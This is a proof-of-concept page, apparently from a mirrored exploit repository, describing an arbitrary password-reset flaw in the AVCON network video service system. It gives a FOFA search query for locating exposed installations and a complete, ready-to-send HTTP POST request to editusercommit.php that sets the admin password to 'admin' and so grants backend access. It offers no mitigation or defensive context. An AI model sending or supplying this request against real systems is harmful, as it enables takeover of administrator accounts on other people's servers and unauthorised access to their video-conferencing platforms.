admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/AVCON/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md
wy876 299ba35f30 整理文件
2024-08-21 15:08:43 +08:00

29 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞
AVCON-网络视频服务系统通过接口 `/avcon/av_user/editusercommit.php?currentpage=1` 重置admin用户的密码从而登录系统后台。
## fofa
```yaml
title=="avcon 网络视频会议系统"
```
## poc
```java
POST /avcon/av_user/editusercommit.php?currentpage=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=4
userid=admin&username=administration&password=admin&rpassword=admin&question=admin&answer=123&gender=%E7%94%B7&birthday=0000-00-00&edutypeid=0&phone=&mobile=&email=&address=&postcode=&go=-2&confirm=+++%E7%A1%AE%E5%AE%9A+++
```
Reference in New Issue View Git Blame Copy Permalink